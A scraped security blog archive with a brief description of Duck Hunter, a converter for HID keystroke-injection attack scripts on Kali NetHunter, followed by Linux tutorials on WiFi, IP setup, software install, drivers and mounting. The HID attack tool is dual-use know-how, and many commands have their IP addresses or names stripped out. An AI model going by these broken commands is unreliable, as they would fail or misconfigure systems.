Never Ending Security

It starts all here

Category Archives: Scripts and Config

Duck Hunter

Duck Hunter

Converts a USB Rubber ducky script into a Kali Nethunter friendly format for the HID attack

Original code and concept by @binkybear


Running Duck Hunter -l {us} input.txt

Suppourts multiple languages: us, fr, de, es, sv, it, uk, ru, dk, no, pt, be

Output file can be run as a regular shell file on Nethunter devices.

Keyboard Commands

Here is a list of commands that will work with your Duck Hunter input file for conversion:

DELAY 1000

In miliseconds, 1000 is equal to 1 second


Apple command key with space will load spotlight


Windows + R key for run


Load an elevated command line in Windows 7


Load an elevated command line in Windows 8

STRING echo "I love ducks"

We pass text we want to type with the STRING command. STRING will by default press enter at the end of line.

TEXT echo "I love ducky"

TEXT is similar to STRING command but instead of pressing ENTER after text is type, we leave text where it is. Useful if you want to type something then combine with other commands.

Other useful commands:


Keys can also be combined into: CTRL ALT DEL

Mouse Commands


Left click and right click.

MOUSE 100 0

Will move 100 pixels to right.

MOUSE 0 -50

Will move 50 pixels up.

More Info on:


Connect to WiFi Network From Command Line In Linux

How many of you failed to connect to WiFi network in Linux? Did you bumped into issues like the followings in different forums, discussion page, blogs? I am sure everyone did at some point. Following list shows just the results from Page 1 of a Google search result with “Unable to connect to WiFi network in Linux” keywords.Connect to WiFi network in Linux from command line - blackMORE Ops

  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless

Following guide explains how you can connect to a WiFi network in Linux from command Line. This guide will take you through the steps for connecting to a WPA/WPA2 WiFi network.


  • WiFi network from command line – Required tools
  • Linux WPA/WPA2/IEEE 802.1X Supplicant
    • iw – Linux Wireless
    • ip – ip program in Linux
    • ping
  • Step 1: Find available WiFi adapters – WiFi network from command line
  • Step 2: Check device status – WiFi network from command line
  • Step 3: Bring up the WiFi interface – WiFi network from command line
  • Step 4: Check the connection status – WiFi network from command line
  • Step 5: Scan to find WiFi Network – WiFi network from command line
  • Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line
  • Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line
  • Step 8: Get an IP using dhclient – WiFi network from command line
  • Step 9: Test connectivity – WiFi network from command line
  • Conclusion

WiFi network from command line – Required tools

Following tools are required to connect to WiFi network in Linux from command line

  1. wpa_supplicant
  2. iw
  3. ip
  4. ping

Before we jump into technical jargons let’s just quickly go over each item at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211 based CLI configuration utility for wireless devices. It supports all new drivers that have been added to the kernel recently. The old tool iwconfing, which uses Wireless Extensions interface, is deprecated and it’s strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show / manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices and it helps you to find general networking informations. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see full help/man page.


Good old ping For every ping, there shall be a pong …. ping-pong – ping-pong – ping-pong … that should explain it.

BTW man ping helps too …

Step 1: Find available WiFi adapters – WiFi network from command line

This actually help .. I mean you need to know your WiFi device name before you go an connect to a WiFi network. So just use the following command that will list all the connected WiFi adapters in your Linux machines.

root@kali:~# iw dev
    Interface wlan0
        ifindex 4
        type managed

Let me explain the output:

This system has 1 physical WiFi adapters.

  1. Designated name: phy#1
  2. Device names: wlan0
  3. Interface Index: 4. Usually as per connected ports (which can be an USB port).
  4. Type: Managed. Type specifies the operational mode of the wireless devices. managed means the device is a WiFi station or client that connects to an access point.

Connect to WiFi network in Linux from command line - Find WiFi adapters - blackMORE Ops-1

Step 2: Check device status – WiFi network from command line

By this time many of you are thinking, why two network devices. The reason I am using two is because I would like to show how a connected and disconnected device looks like side by side. Next command will show you exactly that.

You can check that if the wireless device is up or not using the following command:

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

As you can already see, I got once interface (wlan0) as state UP and wlan1 as state DOWN.

Look for the word “UP” inside the brackets in the first line of the output.

Connect to WiFi network in Linux from command line - Check device status- blackMORE Ops-2

In the above example, wlan1 is not UP. Execute the following command to

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFI interface

root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

Connect to WiFi network in Linux from command line - Bring device up - blackMORE Ops-3

If you run the show link command again, you can tell that wlan1 is now UP.

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

Step 4: Check the connection status – WiFi network from command line

You can check WiFi network connection status from command line using the following command

root@kali:~# iw wlan0 link
Not connected.

Connect to WiFi network in Linux from command line - Check device connection - blackMORE Ops-4

The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected

root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm 
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0 
---- truncated ----

The 2 important pieces of information from the above are the SSID and the security protocol (WPA/WPA2 vs WEP). The SSID from the above example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important because it determines what tool you use to connect to the network.

— following image is a sample only —

Connect to WiFi network in Linux from command line - Scan Wifi Network using iw - blackMORE Ops - 5

Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.

root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
(where 'abcd1234' was the Network password)

wpa_passphrase uses SSID as a string, that means you need to type in the passphrase for the WiFi networkblackMOREOps after you run the command.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 6

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new configuration (it wont replace existing configurations) in the configurations file /etc/wpa_supplicant.conf.

root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be usingwpa_supplicant to connect. Use the following command

root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument 
ioctl[SIOCSIWENCODEEXT]: Invalid argument 


  • -B means run wpa_supplicant in the background.
  • -D specifies the wireless driver. wext is the generic driver.
  • -c specifies the path for the configuration file.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 7

Use the iw command to verify that you are indeed connected to the SSID.

root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Until step 7, we’ve spent time connecting to the WiFi network. Now use dhclient to get an IP address by DHCP

root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

You can use ip or ifconfig command to verify the IP address assigned by DHCP. The IP address is below.

root@kali:~# ip addr show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet brd scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link 
       valid_lft forever preferred_lft forever


root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30 
 inet addr: Bcast: Mask:
 inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
 RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
 TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)


Add default routing rule.The last configuration step is to make sure that you have the proper routing rules.

root@kali:~# ip route show 
default via dev wlan0 dev wlan0  proto kernel  scope link  src 

Connect to WiFi network in Linux from command line - Check Routing and DHCP - blackMORE Ops - 8

Step 9: Test connectivity – WiFi network from command line

Ping Google’s IP to confirm network connection (or you can just browse?)

root@kali:~# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_req=3 ttl=42 time=265 ms
64 bytes from icmp_req=4 ttl=42 time=176 ms
64 bytes from icmp_req=5 ttl=42 time=174 ms
64 bytes from icmp_req=6 ttl=42 time=174 ms
--- ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms


This is a very detailed and long guide. Here is a short summary of all the things you need to do in just few line.

root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping
(Where wlan0 is wifi adapter and blackMOREOps is SSID)
(Add Routing manually)
root@kali:~# ip route add default via dev wlan0

At the end of it, you should be able to connect to WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit commands as required to meet your needs.

Setup DHCP Or Static IP Address From Command Line In Linux

Did you ever had trouble with Network Manager and felt that you need to try to setup DHCP orstatic IP address from command Line in Linux? I once accidentally removed Gnome (my bad, wasn’t paying attention and did an apt-get autoremove -y .. how bad is that.. ) So I was stuck, I couldn’t connect to Internet to reinstall my Gnome Network Manager because I’m in TEXT modenetwork-manager was broken.  I learned a good lesson. you need internet for almost anything these days unless you’ve memorized all those manual command.

This guide will guide you on how to setup DHCP or static IP address from command Line in Linux. It saved me when I was in trouble, hopefully you will find it useful as well.

Note that my network interface is eth0 for this whole guide. Change eth0 to match your network interface.

Static assignment of IP addresses is typically used to eliminate the network traffic associated with DHCP/DNS and to lock an element in the address space to provide a consistent IP target.

Step 1 : STOP and START Networking service

Some people would argue restart would work, but I prefer STOP-START to do a complete rehash. Also if it’s not working already, why bother?

# /etc/init.d/networking stop
 [ ok ] Deconfiguring network interfaces...done.
 # /etc/init.d/networking start
 [ ok ] Configuring network interfaces...done.

Step 2 : STOP and START Network-Manager

If you have some other network manager (i.e. wicd, then start stop that one).

# /etc/init.d/network-manager stop
 [ ok ] Stopping network connection manager: NetworkManager.
 # /etc/init.d/network-manager start
 [ ok ] Starting network connection manager: NetworkManager.

Just for the kicks, following is what restart would do:

 # /etc/init.d/network-manager restart
 [ ok ] Stopping network connection manager: NetworkManager.
 [ ok ] Starting network connection manager: NetworkManager.

Step 3 : Bring up network Interface

Now that we’ve restarted both networking and network-manager services, we can bring our interface eth0 up. For some it will already be up and useless at this point. But we are going to fix that in next few steps.

# ifconfig eth0 up 
# ifup eth0

The next command shows the status of the interface. as you can see, it doesn’t have any IP address assigned to it now.

 # ifconfig eth0
 eth0      Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Setup DHCP or static IP address from command Line in Linux - blackMORE Ops - 6

Step 4 : Setting up IP address – DHCP or Static?

Now we have two options. We can setup DHCP or static IP address from command Line in Linux. If you decide to use DHCP address, ensure your Router is capable to serving DHCP. If you think DHCP was the problem all along, then go for static.

Again, if you’re using static IP address, you might want to investigate what range is supported in the network you are connecting to. (i.e. some networks uses, some uses etc. ranges). For some readers, this might be trial and error method, but it always works.

Step 4.1 – Setup DHCP from command Line in Linux

Assuming that you’ve already completed step 1,2 and 3, you can just use this simple command

The first command updates/etc/network/interfaces file with eth0 interface to use DHCP.

# echo “iface eth0 inet dhcp” >>/etc/network/interfaces

The next command brings up the interface.

# ifconfig eth0 up 
# ifup eth0

With DHCP, you get IP address, subnet mask, broadcast address, Gateway IP and DNS ip addresses. Go to step xxx to test your internet connection.

Step 4.2 – Setup static IP, subnet mask, broadcast address in Linux

Use the following command to setup IP, subnet mask, broadcast address in Linux. Note that I’ve highlighted the IP addresses in red. You will be able to find these details from another device connected to the network or directly from the router or gateways status page. (i.e. some networks uses, some uses etc. ranges)

 # ifconfig eth0
 # ifconfig eth0 netmask
 # ifconfig eth0 broadcast

Next command shows the IP address and details that we’ve set manually.

# ifconfig eth0
 eth0     Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 inet addr:  Bcast:  Mask:
 RX packets:19325 errors:0 dropped:0 overruns:0 frame:0
 TX packets:19641 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Because we are doing everything manually, we also need to setup the Gateway address for the interface. Use the following command to add default Gateway route to eth0.

# route add default gw eth0

We can confirm it using the following command:

# route -n
 Kernel IP routing table
 Destination     Gateway         Genmask         Flags Metric Ref    Use Iface         UG    0      0        0 eth0   U     0      0        0 eth0

Step 4.3 – Alternative way of setting Static IP in a DHCP network

If you’re connected to a network where you have DHCP enabled but want to assign a static IP to your interface, you can use the following command to assign Static IP in a DHCP network, netmask and Gateway.

# echo -e “iface eth0 inet dhcp\n address\n netmask\n gateway″>>/etc/network/interfaces 

At this point if your network interface is not up already, you can bring it up.

# ifconfig eth0 up 
# ifup eth0

Step 4.4 –  Fix missing default Gateway

Looks good to me so far. We’re almost there.

Try to ping (cause if is down, Internet is broken!):

# ping
 PING ( 56(84) bytes of data.
 64 bytes from ( icmp_req=1 ttl=49 time=520 ms
 64 bytes from ( icmp_req=2 ttl=49 time=318 ms
 64 bytes from ( icmp_req=3 ttl=49 time=358 ms
 64 bytes from ( icmp_req=4 ttl=49 time=315 ms
 --- ping statistics ---
 4 packets transmitted, 4 received, 0% packet loss, time 3002ms
 rtt min/avg/max/mdev = 315.863/378.359/520.263/83.643 ms

It worked!

Step 5 : Setting up nameserver / DNS

For most users step 4.4 would be the last step. But in case you get a DNS error you want to assign DNS servers manually, then use the following command:

# echo “nameserver\n nameserver″ >>/etc/resolv.conf

This will add Google Public DNS servers to your resolv.conf file. Now you should be able to ping or browse to any website.


Losing internet connection these days is just painful because we are so dependent on Internet to find usable information. It gets frustrating when you suddenly lose your GUI and/or your Network Manager and all you got is either an Ethernet port or Wireless card to connect to the internet. But then again you need to memorize all these steps.

I’ve tried to made this guide as much generic I can, but if you have a suggestion or if I’ve made a mistake, feel free to comment. Thanks for reading. Please share & RT.

Highly Useful Linux Commands & Configurations

Oh, you’re gonna love this article! Even though there are many websites hawking similar content, with varying degree of clarity and quality, I want to offer a short, easy-to-use guide to some of the most common yet highly useful commands that could help make your Linux experience more joyful.

Now that you have read some of my installation guides, you have probably setup your system and configured the basic settings. However, I’m positive that some of you must have encountered certain difficulties – a missing package, a missing driver. The initial effort required of a Linux novice can appear daunting, especially after many years of Windows discipline.

Therefore, this article was born, in order to offer simple solutions to some of the more widespread problems that one might face during and immediately after a Linux installation. It is intended for the beginner and intermediate users, who still feel slightly uncomfortable with meddling in command line, scripts or configuration files.

This article will refer to Ubuntu Linux distribution as the demonstration platform. However, all of these commands will work well with many other Linux distributions, with only small changes in syntax, at most. I have personally tested and used all of the commands and configurations in both Debian-based and RedHat-based distributions with success.

What am I going to write about?

Here are the topics. If you want to skip through some of the paragraphs, you can use the table of contents further below, but I recommend you read everything.

  • Basic tips – avoiding classic mistakes.
  • Commands – an introduction to the command line.
  • Installation of software – including extraction of archives and compilation of sources.
  • Installation of drivers – including compilation, loading, configuration, and addition of drivers to the bootup chain, writing of scripts and addition to the bootup chain.
  • Mounting of drives – including NTFS and FAT32 filesystems and read/write permissions.
  • Installation of graphic card drivers – including troubleshooting of stubborn common problems.
  • Network sharing – how to access shared folders in Windows and Linux from one another.
  • Printer sharing – how to share printers in Windows and Linux from one another.
  • Some other useful commands.

Table of contents

  1. Basic tips
  2. Commands
    1. Asking for help
  3. Installation of software
    1. What should you choose?
    2. Discipline
    3. Unpacking an archive
    4. Zipped archives
    5. Installation
    6. Compilation (from sources)
    7. Summary of installation procedures
  4. Installation of drivers
    1. Installation
    2. Loading drivers
    3. Configuration of drivers
    4. Scripts
  5. Mounting a drive
    1. Other options
  6. Installation of graphic card drivers
  7. Network sharing
    1. Windows > Linux
    2. Linux > Windows
  8. Printer sharing
  9. Other useful commands
    1. Switching between runlevels
    2. Backing up the X Windows configuration file (useful before graphic drivers update)
    3. Display system environment information
    4. Listing information about files and folders
    5. Kill a process

Basic tips

There are some things you need to know before heading into the deep waters of the Command Line:

  • Linux commands are cAse-sensitive (dedoimedo and Dedoimedo are two different files).
  • It is best to create folders and files in Linux WITHOUT spaces. For example: Red Gemini.doc is a valid Windows filename, but you might have problems accessing it from the command line in Linux; you should rename the file to RedGemini.doc. Users of the DOS command line are also familiar with this problem – commands will fail on folders and files with more than a single word, unless explicitly declared with double quotation marks (“like this”).
  • Pressing TAB when typing a command will auto-complete the command. For example: if you have a single file in a certain folder that begins with the letter p, typing p then TAB will automatically complete the name regardless of its length; if you have more than one file, the command will complete the maximum available part of the string that matches all relevant filenames (s + TAB for smirk and smile will auto-complete to smi).
  • Before copying, moving, deleting, or tweaking any file, especially scripts and configuration files, it is best to back them up first.
  • Do NOT stop the commands while they are running (by pressing Ctrl + C). Even though you may not see the HDD light blinking and the execution takes a very long time, do not assume the system is frozen. Unlike Windows, Linux almost never gets stuck. Let the command complete, be it 5 seconds or 5 hours. Just for reference, compilation of certain programs can take a few days to complete.


To be able to use the command line, you need to be familiar with some rudimentary Linux commands. Former users of DOS will find the transition very simple. Below you can find links to some of the basic Linux commands:

Alphabetic Directory of Linux Commands

An A-Z Index of the Linux BASH command line

Some Useful Linux Commands

Asking for help

First, anything and everything you could ever probably think of has already been answered at least once in a Linux forum; use the forums to find solutions to … everything. Copy & paste your error code / message into a search engine of your choosing (e.g. Google) and you will find links to answers in 99.9996532% of cases.

Locally, help is one of the most useful features available to the command line user. If, for some reason, you cannot figure out the syntax required to use the file, you can ask for help. There are two ways of doing it:

man some_command

The above usage will display a full help file for the command in question in Vi text editor. You can learn more about Vi from An Extremely Quick and Simple Introduction to the Vi Text Editor.

some_command –help

The above usage will display a summary of available options for the command in question, inside the command line terminal. You will most likely prefer to use this second way.

Installation of software

Although most Linux distributions offer a wealth of useful programs, you will probably be compelled to try new products. Some programs will be available for download via package managers, like Synaptic. Others will only be found on the developer’s site, most likely packaged inside an archive.

You probably ask yourself: What now? The answer is very simple. There are three versions to your downloads, from the easiest to hardest:

  1. Compiled packages, usually with .rpm or .deb extension. These packages are identical to Windows .exe installers and will unpack and install automatically. The upside of the packages is the relative use of their deployment; the downside is that the user has no control over the installation script.
  2. Compiled archives, called tarballs, with .tar extension. These archives will contain all of the necessary files required to make a program run, but the user will have to install them manually, from the command line, after unpacking the archive. These archives will also most likely be compressed and bear a double extension like tar.gz or tar.bz2. This option offers more control during the installation.
  3. Sources, usually archived. The user will have to unpack the archives and then compile the sources before being able to actually install the program. In addition to better control of the installation, the user will also benefit from software optimized to his hardware configuration.

What should you choose?

The logical choice for the novice user should be 1 > 2 > 3. Intermediate users will probably try 2 > 3. Geeks will most likely ever only compile from sources.


This may sound harsh or strict, but certain unspoken rules are followed, which simplifies the use of software downloads.

  • The program itself will almost always be accompanied with a how-to, usually in a form of a text file that explains what a user should do, prior, during and after the installation. The how-tos are most often found on the site you download the software from, either as a standalone file, an explanatory text on the download page or bundled with the download.
  • You should read this how-to FIRST before downloading / manipulating the software.
  • A secondary how-to will most often be packed with the program, explaining the installation process itself.
  • You should read this how-to FIRST before installing the software.

Unpacking an archive

The exact syntax will differ from one package to another. But the general idea is the same for all. The only difference will be in the arguments used for unpacking. Here are a few common examples:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

You can read in detail about the handling of tarballs on the Wikipedia site.

Zipped archives

Some archives will be zipped rather than tarred. This might put you off. But the problem is easily solvable. If you recall, we have the ability to “ask” for help for each unknown command. In our case, we need to know how to unzip an archive.

unzip –help

Here’s a screenshot I took, depicting the very dilemma we are facing – and its solution:

Linux commands - unzip

A possible usage will then be:

unzip -d /tmp

Reading from the help screen above, we want to unpack our archive into a folder. The argument -d tells us that the contents of the archive will be extracted into a destination directory (folder), in our case a temporary folder called /tmp.


After unpacking the archive, you will now have to install the software. Usually, the installation is invoked by using a script. The exact name of the script will vary from one program to another, as well as its extension, depending on the language used to write it.

For example, the following command will invoke the script named (written in Perl). Dot and trailing slash indicate that the script will be executed within the current directory.


Compilation (from sources)

Sometimes, the programs will not be compiled and ready to install. The archives will contain lots of files with curious extensions like .c, .h and .o. If you are not a programmer, you should not bother understanding what they are and what they do. Likewise, you need not understand how the compilation of sources is made. You just need to remember three simple commands:

This first command will generates files required to build the software and setup system-wide parameters.


This second command will build the libraries and applications.


This third command will install the libraries and applications.

make install

For homework, you could use some reading:

Compiling and installing software from source in Linux

There is no guarantee that the compilation will succeed. Some sources are broken! In that case, you should make note of the errors and post them in relevant forums, where you are most likely to find an answer rather quickly.

Summary of installation procedures

To make things easier to understand, below are two examples showing the list of necessary commands required to run to successfully install a downloaded application (please note these are ONLY examples!). Most likely, you will need root privileges (su or sudo) to be able to install software. An archive containing compiled program:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory

An archive containing sources:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory
make install

Installation of drivers

Drivers are programs, like any software. The only difference is – you do not actively use them. They serve the purpose of making your hardware components understand each other. As simple as that. You need them to enhance your usage of the operating system.

Most often, the necessary drivers will be included with the distribution and installed during the setup. Sometimes, you might not be so lucky and will reach a newly installed desktop without sound, network or video drivers.

I will not go into details explaining how specific drivers are installed. You should contact your vendors for that information. I will explain how to install the drivers, how to load them, and then how to add them to startup, so they will load automatically every time your machine starts.


Just like any software, drivers may be compiled or not. Most often, they will not be. Drivers will usually be distributed as sources, in order to achieve maximal possible compatibility with the hardware on the installation platform. This means you will have to compile from sources. Piece of cake. We already know how to do that.

If the vendor is benevolent, it is possible that the driver will be accompanied with a self-installation script. In other words, you will need to run only one command, which will in turn extract the archive, compile, install, and load it. But this might not be the case – or might not even work. I have personally witnessed a driver self-installation script go wrong. Therefore, for all practical purposes, you should probably manually install the driver.

After successfully extracting the archive and compiling the sources (./configure, make, make install), you will most likely be faced with three choices:

  • The driver will be fully configured and copied to default directories and the system paths updated. You will not need do anything special to use the driver.
  • The driver will be auto-configured and the system paths updated. This means you will only have to add the driver name to the list of drivers loaded during the boot to enable it every time the machine starts.
  • The driver will be ready to use, but will not be configured nor system paths updated. You will have to manually load the driver and then update the list of drivers loaded during the boot to enable it every time the machine starts.

The second option will make the installation process probably look like this:

tar zxf some_driver.tar.gz
tar -xjf some_driver.tar.bz2

cd some_driver_directory
make install



All that remains is to add this driver to the list of drivers loaded at bootup. In Linux, the drivers are often referred to as modules.

You need to open the configuration file containing the list of modules. You should refer to your specific distribution for exact name and location of this file. In Ubuntu, the file is called modules.conf and is found in /etcdirectory (/etc/modules.conf). We will update this file, but first we will back it up! Please remember that you need root privileges to meddle with the configuration files.

This is what our procedure would look like:

cp /etc/modules.conf /etc/modules.conf.bak
gedit /etc/modules.conf

The above commands will open the file modules.conf inside the gedit text editor. Simply add your driver in an empty line below the existing drivers, save the file, exit the text editor, and reboot for the change to take effect. That’s all!

Here’s an example of a modules.conf file for a Kubuntu Linux, installed as a virtual machine. To add a new driver, we would simply write its name below the existing entries. Of course, you need to know the EXACT name of the driver in question.

Linux commands - modules.conf

The third option is a bit more complex.

Loading drivers

You have successfully compiled the driver, but nothing has happened yet. This is because the driver is not yet enabled. Looking inside the directory, you will notice a file with .ko extension. This is your driver and you need to manually load it.

We need to install the driver into the kernel. This can be done using the insmod command.

cd driver_directory
insmod driver.ko

After the driver is loaded, it can be configured. To verify that the driver is indeed present, you can list all the available modules:


If by some chance you have made a terrible mistake and you wish to remove the driver, you can use thermmod command:


Configuration of drivers

Configuring the driver requires a bit of knowledge into its functionality. Most often, instructions will be included in the how-to text files.

Below, the example demonstrates how the network card is configured after the network driver is loaded. The network card is assigned an identifier and an IP address. In this particular case, eth0 was the selected device name, although it could be also eth1, eth2 or any the name. The assigned IP address tells us the machine will be part of a LAN network.

ifconfig eth0

After a reboot, you will realize that you no longer enjoy a network connection. This is because your driver has not been created in a common default directory and the system does not know where to look for it. You will have to repeat the entire procedure again:

cd driver_directory
insmod driver.ko
ifconfig eth0

You now realize that an automated script would be an excellent idea for solving this problem. This is exactly what we’re going to do – write a script and add it to bootup.


Like in DOS and Windows, scripts can be written in any text editor. However, special changes are needed to separate between text files and scripts. In the Windows department, simply renaming the .txt extension to .bat will convert the file to a script. In Linux, things are a bit different.

Linux command line lives inside a shell – or more precisely Shell. There are several Shells, each with a unique set of commands. The most common (and default) Linux Shell is the BASH. We need to add this information to our script, if we wish to make it communicate with our Shell. Therefore, the above commands + Shell addition will make the following script:


cd driver_directory
insmod driver.ko
ifconfig eth0

We can also make it shorter:


insmod /home/roger/driver_directory/driver.ko
ifconfig eth0

Now, we have a script. Or rather a text file that contains the relevant commands. We need to make it into an executable file. First, we need to save the file. Let’s call it network_script. To make the script executable:

chmod +x network_script

Now we have a real script. We need to place it in the /etc/init.d directory so that it will be run during bootup.

cp network_script /etc/init.d/

And finally, we need to update the system, so it will take our script into consideration.

update-rc.d network_script defaults

After you reboot, you will realize that your driver loads automatically and that your network card is configured! Alternatively, it is possible that the make install of the driver will place in the default directory:

/lib/modules/<KERNEL VERSION>/kernel/drivers/net/driver.ko

Or you could place the driver in this directory by yourself. This way, you will be able to avoid the step of writing the script. However, my method, even if not the most elegant one, has one advantage: Drivers that you have manually compiled and placed into the default directories will be lost every time you update the kernel. This means you will have to reinstall them again after every such update. My method un-elegantly escapes this problem.

Mounting a drive

If you run a dual-boot system, it is entirely possible that you have installed your Linux before you have formatted all the Windows drives. This means that some of these drives might not be mounted – or accessible – when you’re booted in Linux. Alternatively, you might have formatted the drives, but you have resized and relettered and renamed the partitions and they are no longer recognized by Linux. Furthermore, you just might be unlucky and your Linux refuses to see the drives despite your best efforts. Finally, you might be able to see them, but you cannot write to the NTFS drives and this irks you so. Compared to the above tasks, mounting drives is a simple job.

To be able to do this correctly, you need to know how your drives are ordered and what they are called, both in Windows and Linux. This requires that you be able to correlate between Windows partitions (E:\, G:\, K:\ etc.) and Linux partitions (hda1, hda4, hdb2 etc.).

First, make sure you know the order of your partitions in Windows. Then, when booted in Linux, list the Partition Tables:

fdisk -l

The above command will display all the available partitions on your system. In this example, you see only the Linux partitions present, but there might be other (Windows) partitions.

Linux commands - fdisk

For the sake of this exercise, let’s assume that Linux partitions are hda4-6, while Windows partitions are hda1-3.


  • hda1 will be Windows C:\ drive.
  • hda2 will be Windows F:\ drive – also called Data.
  • hda3 will be Windows G:\ drive – also called Games.
  • hda4 will be Linux swap / Solaris.
  • hda5 will be Linux (your /root).
  • hda6 will be Linux (your /home).

Now, before you mount a drive, you need to create a mount point. This is most conveniently done by assigned a directory within the /media directory. For example:

mkdir /media/data

The name data is arbitrary, but it can help relate the mounted drive to its Windows designation. Now, we need to mount the drive that corresponds to data. In our case, this is hda2.

There are several ways of mounting the drive. By default, NTFS partitions are mounted as read-only, although write access can also be enabled. FAT32 partitions are writable by default.

Like before, mounting the drive only once will hold valid for the current session. After reboot, the changes will be lost. Therefore, we need to add the mounting of the relevant partitions to the boot chain. The configuration file that holds this crucial information is called fstab and is located under /etc (/etc/fstab).

Therefore, in order to mount the NTFS drive (Windows F:\ drive called data) as read-only we need to:

  • Create a directory called data within /media.
  • Backup fstab.
  • Add a new line to the fstab file – that will mount the NTFS drive hda2 (Windows F:\data) as read-only.
mkdir /media/data
cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab

After opening the file in the text editor, we need to add the mount command. NTFS read-only:

/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0

